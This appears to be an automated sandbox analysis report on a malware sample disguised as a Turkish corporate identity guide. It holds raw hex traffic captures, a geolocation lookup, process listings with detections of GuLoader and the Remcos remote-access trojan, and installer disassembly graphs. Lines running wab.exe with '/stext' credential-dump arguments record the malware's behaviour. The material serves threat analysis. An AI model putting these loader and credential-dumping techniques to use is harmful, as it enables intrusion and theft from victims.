                                                                                                                                                                                        Data Ascii: Xyv{f{V:*aiX:TatYS"+2|OI9]xM1jp#/vetbgxoli*sE5@rDLI]s47q4>,is!eZI>?LE{pz[F3_h}hhBp&;NI_Kr'I)`?2R^wJU"m"Bcr|ed!RtF<:v,Y])11!/|@]MF4F_<APA@3#\o(&0eX%Q243|nF9YMF2p!_26)yW+nnD/<>AZAaVTffIa4s@sK#xkmO}N>2m%XUa_gUYb6qlxBYUt>_DQ_i4x6;_ D<'wPy2rQ{\n{>N9O!7dI1Xva6iT!s=:vO;`^ki'1CyIJ2ws=RLp=PyZyQQ=+w?_4*MBH&ik4_'I3%Wlg}cc:$ykL`CUV7"_%<'52(qv,U}?{0o\*A6S6dv0,k!,xQ<laTHLN!!wDn:mzHHF*/ ]/#n3sG0{vz_$B2^6c{8X@nVLc"6/)n.NKS&
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905106068 CET17INData Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
                                                                                                                                                                                        Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905236006 CET18INData Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
                                                                                                                                                                                        Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905316114 CET19INData Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
                                                                                                                                                                                        Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905428886 CET21INData Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
                                                                                                                                                                                        Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905550003 CET22INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                                                                        Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905659914 CET24INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                                                                        Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905760050 CET25INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                                                                        Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905874968 CET26INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                                                                        Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                                                                        Oct 30, 2023 14:17:49.905976057 CET28INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
                                                                                                                                                                                        Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                                                                        Oct 30, 2023 14:17:50.209302902 CET29INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                                                                        Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        1192.168.11.2050096178.237.33.5080C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        Oct 30, 2023 14:17:53.285733938 CET541OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                        Host: geoplugin.net
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Oct 30, 2023 14:17:53.539247036 CET547INHTTP/1.1 200 OK
                                                                                                                                                                                        date: Mon, 30 Oct 2023 13:17:53 GMT
                                                                                                                                                                                        server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                        content-length: 958
                                                                                                                                                                                        content-type: application/json; charset=utf-8
                                                                                                                                                                                        cache-control: public, max-age=300
                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 33 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 30 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 46 4c 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 32 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 32 35 2e 37 36 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 38 30 2e 31 39 34 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                                                        Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                        Start time:14:17:26
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:740'313 bytes
                                                                                                                                                                                        MD5 hash:F6CBF303899397B7D28E19930D48627D
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000004.00000002.35514010061.0000000000821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.35514571711.000000000565D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:14:17:35
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Users\user\Desktop\DHRI_kurumsal kimlik rehberi-2023.exe
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.37745505722.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.36576605972.0000000006B3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wheazxfmlszmjbyggwujugr
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcjtaqqgzarzmhukyhhkxsdkut
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                        Start time:14:17:54
                                                                                                                                                                                        Start date:30/10/2023
                                                                                                                                                                                        Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\repdaaihvijewviohscmifybdhowx
                                                                                                                                                                                        Imagebase:0x4f0000
                                                                                                                                                                                        File size:516'608 bytes
                                                                                                                                                                                        MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:21.4%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:19.7%
                                                                                                                                                                                          Total number of Nodes:1548
                                                                                                                                                                                          Total number of Limit Nodes:40
                                                                                                                                                                                          execution_graph 4965 6f3d103d 4968 6f3d101b 4965->4968 4975 6f3d1516 4968->4975 4970 6f3d1020 4971 6f3d1024 4970->4971 4972 6f3d1027 GlobalAlloc 4970->4972 4973 6f3d153d 3 API calls 4971->4973 4972->4971 4974 6f3d103b 4973->4974 4977 6f3d151c 4975->4977 4976 6f3d1522 4976->4970 4977->4976 4978 6f3d152e GlobalFree 4977->4978 4978->4970 3855 401941 3856 401943 3855->3856 3861 402c41 3856->3861 3862 402c4d 3861->3862 3906 4062dc 3862->3906 3865 401948 3867 4059cc 3865->3867 3948 405c97 3867->3948 3870 4059f4 DeleteFileW 3877 401951 3870->3877 3871 405a0b 3872 405b36 3871->3872 3962 4062ba lstrcpynW 3871->3962 3872->3877 3991 4065fd FindFirstFileW 3872->3991 3874 405a31 3875 405a44 3874->3875 3876 405a37 lstrcatW 3874->3876 3963 405bdb lstrlenW 3875->3963 3878 405a4a 3876->3878 3881 405a5a lstrcatW 3878->3881 3883 405a65 lstrlenW FindFirstFileW 3878->3883 3881->3883 3886 405b2b 3883->3886 3904 405a87 3883->3904 3884 405b54 3994 405b8f lstrlenW CharPrevW 3884->3994 3886->3872 3888 405b0e FindNextFileW 3892 405b24 FindClose 3888->3892 3888->3904 3889 405984 5 API calls 3891 405b66 3889->3891 3893 405b80 3891->3893 3894 405b6a 3891->3894 3892->3886 3896 405322 24 API calls 3893->3896 3894->3877 3897 405322 24 API calls 3894->3897 3896->3877 3899 405b77 3897->3899 3898 4059cc 60 API calls 3898->3904 3901 406080 36 API calls 3899->3901 3900 405322 24 API calls 3900->3888 3902 405b7e 3901->3902 3902->3877 3904->3888 3904->3898 3904->3900 3967 4062ba lstrcpynW 3904->3967 3968 405984 3904->3968 3976 405322 3904->3976 3987 406080 MoveFileExW 3904->3987 3920 4062e9 3906->3920 3907 406534 3908 402c6e 3907->3908 3939 4062ba lstrcpynW 3907->3939 3908->3865 3923 40654e 3908->3923 3910 406502 lstrlenW 3910->3920 3911 4062dc 10 API calls 3911->3910 3914 406417 GetSystemDirectoryW 3914->3920 3916 40642a GetWindowsDirectoryW 3916->3920 3917 40654e 5 API calls 3917->3920 3918 4062dc 10 API calls 3918->3920 3919 4064a5 lstrcatW 3919->3920 3920->3907 3920->3910 3920->3911 3920->3914 3920->3916 3920->3917 3920->3918 3920->3919 3921 40645e SHGetSpecialFolderLocation 3920->3921 3932 406188 3920->3932 3937 406201 wsprintfW 3920->3937 3938 4062ba lstrcpynW 3920->3938 3921->3920 3922 406476 SHGetPathFromIDListW CoTaskMemFree 3921->3922 3922->3920 3930 40655b 3923->3930 3924 4065d1 3925 4065d6 CharPrevW 3924->3925 3928 4065f7 3924->3928 3925->3924 3926 4065c4 CharNextW 3926->3924 3926->3930 3928->3865 3929 4065b0 CharNextW 3929->3930 3930->3924 3930->3926 3930->3929 3931 4065bf CharNextW 3930->3931 3944 405bbc 3930->3944 3931->3926 3940 406127 3932->3940 3935 4061ec 3935->3920 3936 4061bc RegQueryValueExW RegCloseKey 3936->3935 3937->3920 3938->3920 3939->3908 3941 406136 3940->3941 3942 40613a 3941->3942 3943 40613f RegOpenKeyExW 3941->3943 3942->3935 3942->3936 3943->3942 3945 405bc2 3944->3945 3946 405bd8 3945->3946 3947 405bc9 CharNextW 3945->3947 3946->3930 3947->3945 3997 4062ba lstrcpynW 3948->3997 3950 405ca8 3998 405c3a CharNextW CharNextW 3950->3998 3953 4059ec 3953->3870 3953->3871 3954 40654e 5 API calls 3957 405cbe 3954->3957 3955 405cef lstrlenW 3956 405cfa 3955->3956 3955->3957 3959 405b8f 3 API calls 3956->3959 3957->3953 3957->3955 3958 4065fd 2 API calls 3957->3958 3961 405bdb 2 API calls 3957->3961 3958->3957 3960 405cff GetFileAttributesW 3959->3960 3960->3953 3961->3955 3962->3874 3964 405be9 3963->3964 3965 405bfb 3964->3965 3966 405bef CharPrevW 3964->3966 3965->3878 3966->3964 3966->3965 3967->3904 4004 405d8b GetFileAttributesW 3968->4004 3970 4059b1 3970->3904 3972 4059a7 DeleteFileW 3974 4059ad 3972->3974 3973 40599f RemoveDirectoryW 3973->3974 3974->3970 3975 4059bd SetFileAttributesW 3974->3975 3975->3970 3977 40533d 3976->3977 3986 4053df 3976->3986 3978 405359 lstrlenW 3977->3978 3979 4062dc 17 API calls 3977->3979 3980 405382 3978->3980 3981 405367 lstrlenW 3978->3981 3979->3978 3982 405395 3980->3982 3983 405388 SetWindowTextW 3980->3983 3984 405379 lstrcatW 3981->3984 3981->3986 3985 40539b SendMessageW SendMessageW SendMessageW 3982->3985 3982->3986 3983->3982 3984->3980 3985->3986 3986->3904 3988 4060a1 3987->3988 3989 406094 3987->3989 3988->3904 4007 405f06 3989->4007 3992 406613 FindClose 3991->3992 3993 405b50 3991->3993 3992->3993 3993->3877 3993->3884 3995 405b5a 3994->3995 3996 405bab lstrcatW 3994->3996 3995->3889 3996->3995 3997->3950 3999 405c57 3998->3999 4001 405c69 3998->4001 4000 405c64 CharNextW 3999->4000 3999->4001 4003 405c8d 4000->4003 4002 405bbc CharNextW 4001->4002 4001->4003 4002->4001 4003->3953 4003->3954 4005 405990 4004->4005 4006 405d9d SetFileAttributesW 4004->4006 4005->3970 4005->3972 4005->3973 4006->4005 4008 405f36 4007->4008 4009 405f5c GetShortPathNameW 4007->4009 4034 405db0 GetFileAttributesW CreateFileW 4008->4034 4010 405f71 4009->4010 4011 40607b 4009->4011 4010->4011 4013 405f79 wsprintfA 4010->4013 4011->3988 4015 4062dc 17 API calls 4013->4015 4014 405f40 CloseHandle GetShortPathNameW 4014->4011 4016 405f54 4014->4016 4017 405fa1 4015->4017 4016->4009 4016->4011 4035 405db0 GetFileAttributesW CreateFileW 4017->4035 4019 405fae 4019->4011 4020 405fbd GetFileSize GlobalAlloc 4019->4020 4021 406074 CloseHandle 4020->4021 4022 405fdf 4020->4022 4021->4011 4036 405e33 ReadFile 4022->4036 4027 406012 4029 405d15 4 API calls 4027->4029 4028 405ffe lstrcpyA 4030 406020 4028->4030 4029->4030 4031 406057 SetFilePointer 4030->4031 4043 405e62 WriteFile 4031->4043 4034->4014 4035->4019 4037 405e51 4036->4037 4037->4021 4038 405d15 lstrlenA 4037->4038 4039 405d56 lstrlenA 4038->4039 4040 405d5e 4039->4040 4041 405d2f lstrcmpiA 4039->4041 4040->4027 4040->4028 4041->4040 4042 405d4d CharNextA 4041->4042 4042->4039 4044 405e80 GlobalFree 4043->4044 4044->4021 4045 4015c1 4046 402c41 17 API calls 4045->4046 4047 4015c8 4046->4047 4048 405c3a 4 API calls 4047->4048 4060 4015d1 4048->4060 4049 401631 4051 401663 4049->4051 4052 401636 4049->4052 4050 405bbc CharNextW 4050->4060 4054 401423 24 API calls 4051->4054 4072 401423 4052->4072 4062 40165b 4054->4062 4059 40164a SetCurrentDirectoryW 4059->4062 4060->4049 4060->4050 4061 401617 GetFileAttributesW 4060->4061 4064 40588b 4060->4064 4067 4057f1 CreateDirectoryW 4060->4067 4076 40586e CreateDirectoryW 4060->4076 4061->4060 4079 406694 GetModuleHandleA 4064->4079 4068 405842 GetLastError 4067->4068 4069 40583e 4067->4069 4068->4069 4070 405851 SetFileSecurityW 4068->4070 4069->4060 4070->4069 4071 405867 GetLastError 4070->4071 4071->4069 4073 405322 24 API calls 4072->4073 4074 401431 4073->4074 4075 4062ba lstrcpynW 4074->4075 4075->4059 4077 405882 GetLastError 4076->4077 4078 40587e 4076->4078 4077->4078 4078->4060 4080 4066b0 4079->4080 4081 4066ba GetProcAddress 4079->4081 4085 406624 GetSystemDirectoryW 4080->4085 4083 405892 4081->4083 4083->4060 4084 4066b6 4084->4081 4084->4083 4086 406646 wsprintfW LoadLibraryExW 4085->4086 4086->4084 4161 401e49 4162 402c1f 17 API calls 4161->4162 4163 401e4f 4162->4163 4164 402c1f 17 API calls 4163->4164 4165 401e5b 4164->4165 4166 401e72 EnableWindow 4165->4166 4167 401e67 ShowWindow 4165->4167 4168 402ac5 4166->4168 4167->4168 4169 40264a 4170 402c1f 17 API calls 4169->4170 4172 402659 4170->4172 4171 402796 4172->4171 4173 4026a3 ReadFile 4172->4173 4174 40273c 4172->4174 4175 405e33 ReadFile 4172->4175 4177 4026e3 MultiByteToWideChar 4172->4177 4178 402798 4172->4178 4180 402709 SetFilePointer MultiByteToWideChar 4172->4180 4181 4027a9 4172->4181 4173->4171 4173->4172 4174->4171 4174->4172 4183 405e91 SetFilePointer 4174->4183 4175->4172 4177->4172 4192 406201 wsprintfW 4178->4192 4180->4172 4181->4171 4182 4027ca SetFilePointer 4181->4182 4182->4171 4184 405ead 4183->4184 4185 405ec5 4183->4185 4186 405e33 ReadFile 4184->4186 4185->4174 4187 405eb9 4186->4187 4187->4185 4188 405ef6 SetFilePointer 4187->4188 4189 405ece SetFilePointer 4187->4189 4188->4185 4189->4188 4190 405ed9 4189->4190 4191 405e62 WriteFile 4190->4191 4191->4185 4192->4171 4982 4016cc 4983 402c41 17 API calls 